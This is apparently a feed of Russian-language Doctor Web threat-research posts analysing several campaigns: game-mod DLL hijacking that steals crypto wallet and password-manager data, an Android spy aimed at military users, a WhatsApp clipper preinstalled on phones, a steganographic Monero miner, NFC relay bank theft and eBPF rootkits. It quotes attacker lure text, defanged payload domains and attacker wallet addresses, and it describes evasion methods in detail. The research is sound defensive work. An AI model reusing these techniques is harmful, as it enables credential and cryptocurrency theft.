В этой цепочке заражения стартовым компонентом является вредоносная программа Trojan.Scavenger.1, представляющая собой динамическую библиотеку (DLL). Она может распространяться как в составе пиратских игр, так и под видом различных игровых патчей, читов и модов через торренты и посвященные игровой тематике сайты. Далее мы рассмотрим пример, где мошенники выдают трояна за патч.

Trojan.Scavenger.1 распространяется в ZIP-архиве вместе с инструкцией по установке. В ней злоумышленники побуждают потенциальную жертву поместить «патч» в каталог с игрой Oblivion Remastered — якобы для улучшения ее производительности:

Drag umpdc.dll and engine.ini to the game folder:
\steamapps\common\Oblivion Remastered\OblivionRemastered\Binaries\Win64
 
Engine.ini will automatically be loaded by the module.
The module will also apply some native patches to improve performance

Имя вредоносного файла выбрано атакующими не случайно: в ОС Windows легитимный файл с именем umpdc.dll располагается в системном каталоге %WINDIR%\System32. Он является частью графического API, которое используют различные программы, в том числе игры. Если в установленной у жертвы версии игры присутствует незакрытая уязвимость, копируемый троянский файл будет автоматически запускаться вместе ней. Стоит отметить, что актуальная на момент проведения исследования версия игры Oblivion Remastered корректно обрабатывала очередность поиска библиотеки umpdc.dll, поэтому в рассматриваемом примере Trojan.Scavenger.1 не мог автоматически запуститься с ней и продолжить цепочку заражения.

При успешном старте троян скачивает с удаленного сервера и запускает следующую стадию — загрузчика Trojan.Scavenger.2 (tmp6FC15.dll). Тот в свою очередь скачивает и устанавливает в систему другие модули семейства — Trojan.Scavenger.3 и Trojan.Scavenger.4.

Trojan.Scavenger.3 представляет собой динамическую библиотеку version.dll, которая копируется в каталог одного из целевых браузеров, построенных на базе движка Chromium. Она имеет такое же имя, как и одна из системных библиотек в директории %WINDIR%\System32. Уязвимые к перехвату порядка поиска DLL браузеры не проверяют, откуда загружается библиотека с таким именем. А поскольку троянский файл находится в их каталоге, он имеет приоритет над легитимной системной библиотекой и загружается первым. Наши вирусные аналитики зафиксировали попытки эксплуатации данной уязвимости в браузерах Google Chrome, Microsoft Edge, Яндекс Браузере и Opera.

После старта Trojan.Scavenger.3 отключает защитные механизмы целевого браузера — например, запуск его песочницы, — в результате чего в нем пропадает изоляция выполняемого JS-кода. Кроме того, троян отключает проверку расширений в браузере. Для этого он определяет соответствующую библиотеку Chromium по наличию в ней экспортируемой функции CrashForExceptionInNonABICompliantCodeRange. Затем он выполняет поиск процедуры проверки расширений в этой библиотеке и вносит соответствующий патч.

Далее троян модифицирует установленные в браузере целевые расширения, получая необходимые модификации в виде JavaScript-кода с C2-сервера. Изменениям подвергаются:

криптокошельки
- Phantom
- Slush
- MetaMask
менеджеры паролей
- Bitwarden
- LastPass

При этом модифицируются не оригиналы, а копии, которые троян предварительно помещает в каталог %TEMP%/ServiceWorkerCache. А чтобы браузер «подхватил» измененные расширения, Trojan.Scavenger.3 перехватывает управление функциями CreateFileW и GetFileAttributesExW, подменяя локальные пути к оригинальным файлам на пути к модификациям (Dr.Web детектирует их как Trojan.Scavenger.5).

Сами модификации представлены двумя вариантами:

добавляется временная метка к Cookie;
добавляется отправка пользовательских данных на C2-сервер.

Из криптокошельков Phantom, Slush и MetaMask злоумышленникам передаются приватные ключи и мнемонические фразы. От менеджера паролей Bitwarden им отправляется Cookie авторизации, а от LastPass — добавляемые жертвами пароли.

В свою очередь, Trojan.Scavenger.4 (profapi.dll) копируется в каталог с приложением криптокошелька Exodus. Троян запускается автоматически вместе с данной программой, также эксплуатируя в ней уязвимость DLL Search Order Hijacking (легитимная системная библиотека profapi.dll находится в директории %WINDIR%\System32, но из-за уязвимости приоритет загрузки при запуске кошелька отдается троянскому файлу).

После старта Trojan.Scavenger.4 перехватывает функцию v8::String::NewFromUtf8 из движка V8 для работы с JavaScript и WebAssambly. С ее помощью вредоносная программа отслеживает JSON, сформированные целевым приложением, и может получать различные пользовательские данные. В случае с программой Exodus троян ищет JSON, в котором присутствует ключ passphrase, после чего считывает его значение. В результате он получает пользовательскую мнемоническую фразу, которой можно расшифровать или сгенерировать приватный ключ от криптокошелька жертвы. Далее троян находит приватный ключ seed.seco от криптокошелька, считывает его и вместе с ранее полученной мнемонической фразой отправляет на C2-сервер.

Цепочка из двух загрузчиков

Данная цепочка в целом идентична первой, однако в распространяемых архивах с «патчами» и «читами» к играм вместо Trojan.Scavenger.1 находится модифицированная версия Trojan.Scavenger.2, представленная не в качестве DLL-файла, а в виде файла с расширением .ASI (фактически это динамическая библиотека с измененным расширением).

Архив также сопровождается инструкциями по установке:

Copy BOTH the Enhanced Nave Trainer folder and "Enhanced Native Trainer.asi" to the same folder as the scripthook and launch GTA.

После того как пользователь копирует файл в указанную директорию, тот будет автоматически запускаться при старте целевой игры, которая будет воспринимать его как свой плагин. С этого момента цепочка заражения повторяет шаги из первого варианта.

Особенности семейства

Большинство троянов семейства имеет ряд общих признаков. Одним из них является стандартная процедура проверки окружения на предмет работы в виртуальной среде или в режиме отладки. Если трояны обнаруживают признаки искусственной среды, они завершают работу.

Другой характерный признак семейства — единый алгоритм общения с управляющим сервером. Для связи с ним трояны проходят этап создания ключа и проверки шифрования. Он состоит из отправки двух запросов. Первый необходим для получения части ключа, который используется для шифрования некоторых параметров и данных в определенных запросах. Второй выполняется с целью проверки ключа и содержит определенные параметры, такие как случайным образом сгенерированная строка, текущее время и зашифрованное значение времени. На него C2-сервер отвечает полученной ранее строкой. Все последующие запросы содержат параметры времени, и при их отсутствии сервер отказывается выполнять соединение.

Подробные технические описания обнаруженных вредоносных программ находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Подробнее о Trojan.Scavenger.1

Подробнее о Trojan.Scavenger.2

Подробнее о Trojan.Scavenger.3

Подробнее о Trojan.Scavenger.4

Подробнее о Trojan.Scavenger.5

Заключение

Мы уведомили разработчиков, в чьем ПО эксплуатировались выявленные бреши в безопасности, однако они сочли уязвимости типа DLL Search Order Hijacking не требующими исправления. Но внедренная в антивирусные продукты Dr.Web защита от атак данного типа успешно противодействовала эксплуатации уязвимостей в затронутых браузерах еще до того, как мы узнали о семействе вредоносных программ Trojan.Scavenger, поэтому нашим пользователям эти трояны не угрожали. А в рамках проведенного исследования под эту защиту было также добавлено и приложение криптокошелька Exodus.

Индикаторы компрометации

Android-шпион нацелен на российских военнослужащих, использующих картографическое ПО Alpine Quest

Mon, 21 Apr 2025 01:00:00 GMT

21 апреля 2025 года

Специалисты компании «Доктор Веб» обнаружили шпиона Android.Spy.1292.origin, основной целью которого являются российские военнослужащие. Троян скрывается в модифицированной злоумышленниками картографической программе Alpine Quest и распространяется в том числе через один из российских каталогов Android-приложений. Среди прочего он передает атакующим информацию о контактах из телефонной книги и геолокацию зараженных устройств. Кроме того, шпион собирает сведения о хранящихся на устройствах файлах и по команде злоумышленников способен загружать дополнительные модули с функциональностью для их кражи.

Alpine Quest — топографическая программа, которая позволяет использовать различные карты как в онлайн-режиме, так и при отсутствии подключения к интернету. Она популярна среди спортсменов, путешественников и охотников, но также нашла широкое применение среди российских военнослужащих в зоне проведения СВО — этим и решили воспользоваться организаторы данной кампании. Злоумышленники встроили Android.Spy.1292.origin в одну из старых версий ПО Alpine Quest и распространяли троянский вариант под видом общедоступной версии программы с расширенной функциональностью, Alpine Quest Pro. Для этого они создали поддельный Telegram-канал приложения, в котором давалась ссылка на загрузку программы в одном из российских каталогов приложений. Позднее эта же троянская версия под видом «обновления» распространялась и в самом канале.

Telegram-канал, через который злоумышленники распространяли трояна Android.Spy.1292.origin

Поскольку Android.Spy.1292.origin встроен в копию настоящего приложения, после установки он выглядит и работает как оригинальная программа, что позволяет ему дольше оставаться незамеченным и выполнять вредоносные функции.

При каждом запуске троян собирает и передает на управляющий сервер следующие данные:

учетные записи пользователя и его номер мобильного телефона;
контакты из телефонной книги;
текущую дату;
текущую геолокацию;
сведения о хранящихся на устройстве файлах;
версию приложения.

При этом он дублирует часть информации в принадлежащий атакующим Telegram-бот. Например, троян отправляет ему данные о новых координатах при каждой смене местоположения устройства.

Получив информацию о доступных файлах, злоумышленники могут дать трояну команду загрузить и запустить вспомогательные модули, с помощью которых тот сможет похищать нужные файлы. Проведенный анализ показал, что создателей шпиона в частности интересуют конфиденциальные документы, которые пользователи передают через мессенджеры Telegram и WhatsApp, а также файл журнала локаций locLog, создаваемый непосредственно программой Alpine Quest.

Таким образом, Android.Spy.1292.origin не только позволяет следить за местоположением пользователей, но и похищать конфиденциальные файлы. При этом его функциональность может быть расширена через загрузку новых модулей, в результате чего он сможет выполнять более широкий спектр вредоносных действий.

Специалисты компании «Доктор Веб» рекомендуют устанавливать Android-приложения только из проверенных источников, таких как официальные каталоги ПО, и не загружать их из Telegram-каналов или с сомнительных сайтов — особенно если речь идет о якобы свободно доступных платных версиях программ. При этом необходимо обращать внимание на то, от имени кого распространяются интересующие приложения, поскольку злоумышленники часто маскируются под настоящих разработчиков, используя для этого похожие имена и логотипы.

Для защиты Android-устройств необходимо пользоваться антивирусом. Dr.Web Security Space для мобильных устройств надежно детектирует и удаляет трояна Android.Spy.1292.origin, поэтому для наших пользователей он опасности не представляет.

Индикаторы компрометации

Подробнее об Android.Spy.1292.origin

Вот и поговорили: что связывает сомнительного качества Android-смартфоны, WhatsApp и кражу криптовалюты?

Mon, 14 Apr 2025 03:00:00 GMT

14 апреля 2025 года

С каждым годом криптовалюты становятся все более привычным методом оплаты. По данным на 2023 год в развитых странах примерно 20% населения когда-либо использовали такие средства платежа, а в развивающихся странах, где банковский сектор не отвечает потребностям населения, число пользователей криптовалют достигает еще больших значений. В рейтингах принятия криптовалют по количеству пользователей Россия находится в первой десятке стран. Анонимность и быстрота платежей, глобальный доступ и низкие комиссии за переводы являются основными преимуществами, которые привлекают рядовых пользователей. А для мошенников особый интерес представляют необратимость транзакций, отсутствие регуляции и недостаток знаний у пользователей ввиду относительной новизны криптовалютной технологии, что позволяет реализовывать самые разнообразные схемы незаконного обогащения.

С июня 2024 года в вирусную лабораторию «Доктор Веб» начали поступать сообщения от наших клиентов, которые установили антивирус Dr.Web Security Space на свежеприобретенные телефоны с ОС Android. При сканировании системного раздела прошивки было выявлено подозрительное приложение, замаскированное под мессенджер WhatsApp (принадлежит компании Meta, признанной экстремистской организацией и запрещенной в РФ). В ходе исследования, проведенного нашими аналитиками, было установлено, что эти случаи — не единичные: они свидетельствуют о мошеннической цепочке в рамках кампании по краже криптовалют методом клиппинга.

Клиппинг — это кража информации путем перехвата и/или подмены данных, которые пользователь копирует в буфер обмена. Наиболее часто клипперы нацелены на поиск в буфере обмена последовательностей символов, соответствующих адресам криптокошельков. В среднем такие строки содержат от 25 до 42 символов. Для удобства работы с такими данными пользователи обычно используют стандартные операции «копировать» и «вставить». Клиппер может воспользоваться этим, перехватив содержимое буфера обмена и незаметно подменив все адреса криптовалютных кошельков на те, которые принадлежат киберпреступникам.

Использование мессенджеров, троянизированных клипперами для кражи финансовой информации, не является новой тактикой для хакеров. Одна из подобных кампаний была выявлена еще в 2023 году. Тогда группа злоумышленников использовала ряд легитимных площадок, таких как Youtube, для распространения ссылок на вредоносные приложения Telegram и WhatsApp. Ссылки размещались в описаниях к видео. Основной целевой аудиторией были китайские пользователи, которые не имеют доступа к иностранным мессенджерам. А поскольку для обхода блокировок они используют ряд ухищрений, в частности скачивание программ с неофициальных сайтов, то такая кампания получила довольно внушительный размах.

Теперь злоумышленники смогли выйти на новый уровень и получить доступ к цепочке поставок ряда китайских производителей смартфонов на базе ОС Android. Именно про такие смартфоны и поступили сообщения в вирусную лабораторию «Доктор Веб». Мошеннические приложения были обнаружены непосредственно в составе предустановленного на телефоне ПО: вредоносный код был добавлен к мессенджеру WhatsApp.

Отметим, что в большинстве случаев скомпрометированные устройства были представлены в нижнем ценовом диапазоне и имели названия, созвучные с моделями известных брендов: S23 Ultra, Note 13 Pro, P70 Ultra и так далее. При этом их технические характеристики были далеки от заявленных. Дело в том, что в состав прошивки входило скрытое приложение, позволяющее с легкостью изменить всю отображаемую техническую информацию об устройстве не только в системном меню, но и в отчетах таких популярных приложений, как AIDA64 и CPU-Z. Кроме того, несмотря на то, что в разделе «Об устройстве» было заявлено об установленной последней версии Android 14, на самом деле все устройства работали под управлением одного и того же билда Android 12. Треть указанных ниже моделей выпускается под брендом SHOWJI. Производителей остальных моделей нам идентифицировать не удалось.

SHOWJI S19 Pro	Note 30i	Camon 20
SHOWJI Note 13 Pro	S23 Ultra	P70 Ultra
SHOWJI X100S Pro	S18 Pro	M14 Ultra
SHOWJI Reno12 Pro	6 Pro	S24 Ultra

Модели смартфонов со встроенным вредоносным ПО, приобретенные нашими пользователями

Изображения из карточек товаров

Скриншот программы для подделывания технических характеристик и результат ее работы

Более достоверные результаты при изучении технических характеристик предоставляет приложение DevCheck. В большинстве случаев оно точно определяет параметры устройства, даже если производитель пытается ввести потребителя в заблуждение.

Троянизированное приложение WhatsApp было создано с помощью инструмента LSPatch. Этот фреймворк позволяет изменять поведение основного приложения, не вмешиваясь в его код, а загружать для этого дополнительные программные модули. В данном случае мошенники разместили в папке assets вредоносный модуль com.whatsHook.apk, выполняющий следующие функции.

Перехват обновления приложения. Теперь вместо проверки обновлений по адресу hxxps://www.whatsapp[.]com/android/current/WhatsApp[.]apk происходит обращение к одному из серверов злоумышленников, например, hххps://apk-download[.]pro/download/whatsapp[.]apk. Это позволяет сохранять троянизированность приложения и вносить в его работу необходимые мошенникам изменения.

Метод, перехватывающий обращения к легитимному адресу обновлений

Класс, который передает поддельный адрес обновлений

Поиск строк в принимаемых и отправляемых сообщениях, соответствующих шаблонам адресов кошельков для криптовалют Tron (строка из 34 символов, начинается с T) и Ethereum (строка из 42 символов, начинается с 0x) и их подмена на адреса злоумышленников. Такая базовая функциональность клиппера была расширена, и теперь факт подмены адреса криптокошелька не виден жертве. В случае исходящего сообщения на скомпрометированном устройстве жертве демонстрируется корректный адрес ее собственного кошелька, а получателю сообщения отправляется адрес кошелька мошенников. При получении же входящего сообщения в чате собеседнику виден адрес отправленного им кошелька, а на устройстве жертвы входящий адрес подменяется на адрес кошелька хакеров. Адреса кошельков мошенников меняются при каждой итерации кампании, но в троян вшиты и резервные адреса ("TN7pfenJ1ePpjoPFaeu46pxjT9rhYDqW66", "0x673dB7Ed16A13Aa137d39401a085892D5e1f0fCA"), которые могут использоваться, если по каким-то причинам связь с С2-сервером не может быть установлена. Дополнительно троян отправляет на сервер злоумышленников все сообщения, отправляемые в мессенджере.

Парсер, выполняющий поиск адресов кошельков Tron

Парсер, выполняющий поиск адресов кошельков Ethereum

Поиск и отправка на сервер злоумышленников всех изображений в форматах jpg, png и jpeg в следующих папках:

DCIM	DOWNLOADS
PICTURES	DOCUMENTS
ALARMS	SCREENSHOTS

Это делается для поиска так называемых мнемонических фраз для криптокошельков, представляющих собой набор из 12–24 слов в определенной последовательности. Такая фраза демонстрируется однократно при создании кошелька и многие пользователи просто делают ее скриншот, а не записывают на отдельный носитель. Такие фразы позволяют восстановить доступ к кошельку, если пользователь забыл пароль. Для злоумышленников получение таких данных означает возможность сразу же вывести все деньги с криптокошелька.

Пример мнемонической фразы для восстановления доступа к криптокошельку. Слова необходимо вводить в соответствии с нумерацией

Отправляет информацию об устройстве: производитель, модель, языковые настройки и имя троянизированного приложения.

В вирусной базе Dr.Web этот троян получил отдельное название Shibai из-за строки Log.e("", "-------------------SHIBAI-释放------------"), содержащейся в его коде. Можно предположить, что это является отсылкой к названию одной из криптомонет.

Следует отметить, что данная кампания является очень масштабной. Аналогичным образом мошенники модифицировали порядка 40 приложений. Среди них — уже упомянутые нами WhatsApp и Telegram, а также другие мессенджеры, сканеры QR-кодов и т. д. Но в основном вмешательству подверглись популярные приложения криптокошельков (Mathwallet, Trust Wallet и другие). Всего было обнаружено более 60 С2-серверов, а для распространения вредоносных приложений задействованы порядка 30 доменов. Также нам удалось получить некоторые сведения о финансовых успехах троянописателей. На одном из отслеживаемых нами кошельков были замечены поступления за два года в размере более миллиона долларов. На другом нашлось ещё полмиллиона. Остальные кошельки (примерно 20 штук) хранили суммы до 100 тысяч долларов. Полную картину о доходности этой кампании получить невозможно, так как адреса кошельков получаются с сервера злоумышленников и каждый раз могут быть разными.

Один из наиболее доходных кошельков злоумышленников

Для защиты от подобных атак вирусные аналитики «Доктор Веб» рекомендуют установить антивирус Dr.Web Security Space для мобильных устройств, не приобретать смартфоны с характеристиками, явно несоответствующими своей цене, скачивать приложения только из доверенных источников, таких как Google Play, Rustore и AppGallery, а также не хранить скриншоты с мнемоническими фразами, паролями и ключами на устройстве в незашифрованном виде.

Подробнее о Tool.LSPatch.1

Подробнее о Android.Clipper.31

Индикаторы компрометации

Доктор, откуда у вас такие картинки? Использование стеганографии при добыче криптовалюты

Fri, 24 Jan 2025 13:00:00 GMT

24 января 2025 года

В ходе анализа данных телеметрии специалисты вирусной лаборатории «Доктор Веб» выявили образцы вредоносного ПО, которые при ближайшем рассмотрении оказались компонентами активной кампании по майнингу криптовалюты Monero. Эта кампания примечательна тем, что реализована в виде ряда вредоносных цепочек, две из которых построены на запуске скриптов, извлекающих вредоносную нагрузку из файлов изображений в формате BMP.

Начало кампании было положено, вероятно, в 2022 году, когда был обнаружен исполняемый файл Services.exe, являющийся .NET-приложением, запускающим сценарий VBscript. Этот сценарий реализует функции бэкдора, связываясь с сервером злоумышленников и выполняя скрипты и файлы, присланные в ответ. Так, на компьютер жертвы скачивался вредоносный файл ubr.txt, являвшийся скриптом для интерпретатора PowerShell, у которого было изменено расширение с ps1 на txt.

Скрипт ubr.txt проверяет наличие майнеров, которые могли быть уже установлены на скомпрометированной машине, и заменяет их на необходимые злоумышленникам версии. Устанавливаемые скриптом файлы представляют собой майнер SilentCryptoMiner и его настройки, с помощью которого хакеры добывали криптовалюту Monero.

Мы уже неоднократно писали об использовании этого майнера злоумышленниками, для которых привлекательна его простота конфигурации, расширенные возможности по добыче различных типов криптовалют и маскировке от диагностических утилит, а также поддержка удаленного управления всеми майнерами в ботнете посредством веб-панели.

В рамках этой кампании файлы майнера маскируются под различное ПО, в частности для проведения видеозвонков в Zoom (ZoomE.exe и ZoomX.exe) или службы Windows (Service32.exe и Service64.exe) и т. д. Несмотря на то, что существует несколько наборов вредоносных файлов, имеющих разные имена, все они выполняют одинаковые задачи — удаление других майнеров, установка нового майнера и доставка обновлений для него.

PowerShell-скрипт ubr.txt

Дополнительно майнер обращается к домену getcert[.]net, на котором расположен файл m.txt с настройками добычи криптовалюты. Этот ресурс также задействован и в других цепочках.

Файл m.txt, содержащий настройки майнера

В дальнейшем мошенники видоизменили методологию атаки, сделав её значительно более интересной и подключив средства стеганографии.

Стеганография — метод сокрытия одной информации внутри другой. В отличие от криптографии, когда зашифрованные данные могут привлечь внимание, стеганография позволяет незаметно скрыть информацию, например, в изображении. Многие эксперты по кибербезопасности полагают, что популярность использования стеганографии для обхода средств защиты будет набирать обороты.

Изображение слева (автор исходного фото: Marek Piwnicki) содержит в себе скрытое изображение с логотипом компании «Доктор Веб»

Вторая, более новая, цепочка реализована посредством трояна Amadey, который запускает PowerShell-скрипт Async.ps1, скачивающий изображения в формате BMP с легитимного хостинга изображений imghippo.com. С помощью стеганографических алгоритмов из изображений извлекаются два исполняемых файла: стилер Trojan.PackedNET.2429 и полезная нагрузка, которая:

отключает запрос UAC на повышение прав для администраторов,
вносит множество исключений во встроенный антивирус Windows Defender,
отключает уведомления в Windows,
создает новую задачу по пути \Microsoft\Windows\WindowsBackup\ с именем 'User'.

Содержимое скрипта Async1.ps

В ходе выполнения задачи происходит обращение к доменам злоумышленников, в записи DNS TXT которых содержится адрес хранения последующей полезной нагрузки. После ее скачивания происходит распаковка архива с изображениями в формате BMP и запуск следующих файлов:

Cleaner.txt — PowerShell-скрипт, удаляющий любые другие майнеры,
m.txt — PowerShell-скрипт, извлекающий полезную нагрузку из изображений m.bmp и IV.bmp. Нагрузка внутри изображений является майнером SilentCryptoMiner и запускающим его инжектором,
Net.txt — скрипт, который читает запись DNS TXT у доменов windowscdn[.]site и buyclients[.]xyz. В этой записи находится ссылка на полезную нагрузку, ведущая на сервис raw.githack[.]com.

Запись DNS TXT представляет собой расширение стандартной записи DNS и содержит текст, который в легитимных целях используется для верификации домена. Тем не менее, владелец домена может внести туда произвольные данные — например, как в данном случае, ссылку на полезную нагрузку.

Содержимое архива с вредоносными изображениями

Модули майнера постоянно развиваются. В последнее время авторы перешли к использованию легитимных ресурсов для размещения вредоносных изображений и платформу GitHub для хранения полезной нагрузки. Кроме того, были найдены модули, проверяющие факт запуска в песочницах и на виртуальных машинах.

Модуль, проверяющий имена запущенных приложений на соответствие названиям популярных инструментов, используемых исследователями кибербезопасности

Один из кошельков, указанный в настройках майнера, был создан в мае 2022 года, и к сегодняшнему дню на него было перечислено 340 XMR. Однако курс данной криптовалюты переживает период существенной волатильности, так что прибыль мошенников может составлять от 6 до 7,5 миллионов рублей. Судя по волнообразности хешрейта, что свидетельствует о регулярном включении и выключении компьютеров, в данной майнинговой кампании участвуют в основном рядовые пользователи, находящиеся в одной группе часовых поясов. В среднем хешрейт составляет 3,3 млн хешей в секунду, что позволяет скомпрометированным машинам приносить злоумышленникам по 1 XMR в 40 часов.

Эта кампания — лишь верхушка айсберга в мире киберугроз, построенных на средствах стеганографии, и она подчеркивает, насколько важно быть бдительными в цифровом пространстве. Рекомендации компании «Доктор Веб» остаются неизменными: устанавливайте программное обеспечение только из надёжных источников, не открывайте подозрительные ссылки и не отключайте антивирусную защиту при скачивании файлов из интернета.

Схема атаки

Индикаторы компрометации

Подробнее о SilentCryptoMiner

Подробнее о PowerShell.Starter.98

Подробнее о PowerShell.DownLoader.1640

Подробнее о Trojan.PackedNET.2429

Подробнее о VBS.DownLoader.2822

Бесконтактный банкинг за себя (и того парня): схема с кражей денег при помощи NFC добралась и до российских пользователей

Thu, 26 Dec 2024 16:35:45 GMT

26 декабря 2024 года

Вирусные аналитики «Доктор Веб» предупреждают о появлении новых версий банковского трояна NGate, нацеленных на российских пользователей. Этот троян передает данные с NFC-чипа скомпрометированного устройства, позволяя злоумышленнику снимать деньги со счетов жертвы в банкоматах без какого-либо участия с её стороны.

Банкер NGate впервые попал на радары антивирусных вендоров еще осенью 2023 года, когда в профильных СМИ стали появляться сообщения об атаках на клиентов крупных чешских банков. Стратегия злоумышленников строилась на комбинации социальной инженерии, фишинга и использования вредоносного ПО. Эти стандартные тактики воплотились в довольно новаторский сценарий: результатом взаимодействия с жертвой становился удаленный доступ к NFC-возможностям её платежного средства. Данная кампания была пресечена органами охраны правопорядка Чехии, однако её идея была адаптирована для российских реалий и реализована для незаконного обогащения за счет пользователей в России.

Событием, запускающее цепочку компрометации, предположительно является звонок от мошенников, которые сообщают о возможности получить различные социальные выплаты или иную финансовую выгоду. Для этого жертве необходимо проследовать по присланной ссылке на мошеннический сайт, откуда скачивается вредоносный APK с трояном NGate, замаскированный под приложение портала Госуслуг, Банка России, или одного из других популярных банков.

Иконки вредоносных приложений, стилизованные под официальные

Банковский троян NGate представляет собой вредоносную модификацию приложения с открытым исходным кодом NFCGate, которое было разработано для отладки протоколов передачи NFC-данных. NFCGate поддерживает ряд функций, однако для злоумышленников наибольший интерес представляют возможность захвата NFC-трафика приложений и передачи его на удаленное устройство, которым может выступать или сервер, или непосредственно смартфон злоумышленников. Преступники модифицировали исходный код, добавив к нему интерфейсы с айдентикой финансовых организаций, и включили режим ретрансляции NFC-данных. Кроме того, в состав приложения включена библиотека nfc-card-reader, которая позволяет хакерам удаленно получить также номер карты и срок ее действия.

После запуска приложения жертве, якобы для верификации себя в качестве клиента, предлагается приложить платежную карту к задней стороне смартфона, ввести свой PIN-код и подождать, пока псевдоприложение распознает карту. В это время происходит считывание данных с банковской карты и передача их преступникам. Обратим внимание на то, что для кражи NFC-данных атакуемый смартфон не требует root-доступа.

Экраны фейковых приложений

Пока жертва удерживает карту, приложенную к своему смартфону, злоумышленник уже будет находиться у банкомата и запрашивать выдачу наличных. Альтернативным вариантом является реализация данной схемы для бесконтактной оплаты покупок. И в момент, когда нужно будет приложить карту, мошенник просто предъявит свой телефон, который передаст цифровой отпечаток банковской карты жертвы. Подтвердить операцию он сможет полученным раннее PIN-кодом.

Во избежание кражи денег аналитики «Доктор Веб» рекомендуют соблюдать следующие правила:

не сообщать никому PIN- или CVV-коды своих банковских карт,
использовать антивирусное ПО, оно заблокирует скачивание и установку вредоносного ПО,
внимательно проверять адреса веб-страниц, где предлагается раскрывать любую финансовую информацию,
устанавливать приложения только из официальных источников, таких как RuStore, AppGalery и Google Play,
не вступать в разговоры с мошенниками. Если поступил неожиданный звонок от сотрудников органов правопорядка, банка, портала Госуслуг, Пенсионного фонда или любой другой организации, то следует повесить трубку. Затем можно найти контактный номер на официальном сайте ведомства и позвонить по нему самостоятельно.

Подробнее об Android.Banker.NGate.1

Индикаторы компрометации

Популяризация технологии eBPF и другие тренды в трояностроении

Tue, 10 Dec 2024 10:26:27 GMT

10 декабря 2024 года

Исследование очередного киберинцидента позволило вирусным аналитикам «Доктор Веб» выявить идущую хакерскую кампанию, в ходе которой проявились многие современные тенденции, применяемые злоумышленниками.

В компанию «Доктор Веб» обратился клиент, который заподозрил факт взлома своей компьютерной инфраструктуры. Выполняя анализ полученных данных, наши вирусные аналитики выявили ряд аналогичных случаев заражения, что позволило сделать вывод о проведении активной кампании. Усилия хакеров в основном сосредоточены на регионе Юго-Восточной Азии. В ходе атак они применяют целый комплекс вредоносного ПО, которое задействуется на разных этапах. К сожалению, нам не удалось однозначно определить то, как был получен изначальный доступ к скомпрометированным машинам. Однако мы смогли восстановить всю дальнейшую картину атаки. Наиболее примечательна эксплуатация злоумышленниками технологии eBPF (extended Berkeley Packet Filter).

Технология eBPF была разработана с целью расширения возможностей контроля над сетевой подсистемой ОС Linux и работой процессов. Она продемонстрировала довольно большой потенциал, что привлекло внимание крупных IT-компаний: практически с самого момента ее появления в фонд eBPF Foundation вошли такие гиганты как Google, Huawei, Intel и Netflix, принявшие участие в ее дальнейшей разработке. Однако еBPF заинтересовались и хакеры.

Предоставляя обширные низкоуровневые возможности, EBPF может использоваться злоумышленниками для сокрытия сетевой активности и процессов, сбора конфиденциальной информации, а также обхода сетевых экранов и систем обнаружения вторжений. Высокая сложность детектирования такого вредоносного ПО позволяет использовать его в рамках целевых АРТ-атак и в течение долгого времени маскировать активность хакеров.

Именно такими возможностями и решили воспользоваться злоумышленники, загрузив на скомпрометированную машину сразу два руткита. Первым устанавливался eBPF-руткит, который скрывал факт работы другого руткита, выполненного в виде модуля ядра, а тот, в свою очередь, подготавливал систему к установке трояна удаленного доступа. Особенностью трояна является поддержка ряда технологий туннелирования трафика, что позволяет ему связываться со злоумышленниками из приватных сегментов сети и маскировать передачу команд.

Использование вредоносного eBPF ПО набирает обороты с 2023 года. Об этом свидетельствует появление на свет нескольких семейств вредоносного ПО, основанных на данной технологии, среди которых можно отметить Boopkit, BPFDoor и Symbiote. А регулярное выявление уязвимостей лишь усугубляет ситуацию. Так, на сегодняшний день известны 217 уязвимостей BPF, причем около 100 из них датированы 2024 годом.

Следующей необычной особенностью кампании является довольно креативный подход к хранению настроек трояна. Если раньше для подобных нужд чаще всего использовались выделенные серверы, то теперь все чаще можно встретить случаи, когда конфигурация вредоносного ПО хранится в открытом доступе на публичных площадках. Так, исследуемое ПО обращалось к платформам Github и даже к страницам одного китайского блога. Такая особенность позволяет меньше привлекать внимание к трафику скомпрометированной машины — ведь та взаимодействует с безопасным узлом сети, — а также не заботиться о поддержании доступа к управляющему серверу с настройками. В целом идея использования публично-доступных сервисов в качестве управляющей инфраструктуры не нова, и ранее хакеры уже применяли для этой цели Dropbox, Google Drive, OneDrive и даже Discord. Однако региональные блокировки этих сервисов в ряде стран, в первую очередь в Китае, делают их менее привлекательными с точки зрения доступности. При этом доступ к Github сохраняется у большинства провайдеров, что делает его предпочтительным в глазах взломщиков.

Настройки, хранящиеся на Gitlab и в блоге, посвященном безопасности. Курьезно, что во втором случае взломщик просит помощи в расшифровке стороннего кода, который в дальнейшем будет отправляться трояну в качестве аргумента одной из команд

Ещё одной особенностью данной кампании стало применение трояна в составе фреймворка для постэксплуатации, то есть комплекса ПО, применяемого на дальнейших этапах атаки после получения доступа к компьютеру. Сами по себе такие фреймворки не являются чем-то запрещённым — их используют компании, официально предоставляющие услуги по аудиту безопасности. Наиболее популярными инструментами являются Cobalt Strike и Metasploit, которые позволяют автоматизировать большое количество проверок и имеют встроенную базу уязвимостей.

Пример карты сети, построенной Cobalt Strike (источник: сайт разработчика)

Конечно, такие возможности высоко ценятся и в среде хакеров. В 2022 году широкому кругу лиц стала доступна взломанная версия ПО Cobalt Strike, что обеспечило всплеск хакерской активности. Значительная часть инфраструктуры Cobalt Strike размещена в Китае. Отметим, что разработчик предпринимает усилия по отслеживанию установок фреймворка, а серверы со взломанными версиями регулярно блокируются органами правопорядка. Поэтому в настоящее время наблюдается устойчивый тренд перехода к использованию фреймворков с открытым исходным кодом, которые изначально поддерживают возможность расширения и видоизменения сетевой активности между зараженным устройством и сервером управления. Такая стратегия является предпочтительной, так как позволяет не привлекать дополнительное внимание к инфраструктуре взломщиков.

По результатам расследования все выявленные угрозы были добавлены в наши базы вредоносного ПО, дополнительно в алгоритмы эвристика были внесены признаки вредоносных eBPF-программ.

Подробнее об Trojan.Siggen28.58279

Индикаторы компрометации

Вредоносные приложения в Google Play: как злоумышленники используют DNS-протокол для скрытой связи троянов с управляющими серверами

Mon, 11 Nov 2024 03:00:00 GMT

11 ноября 2024 года

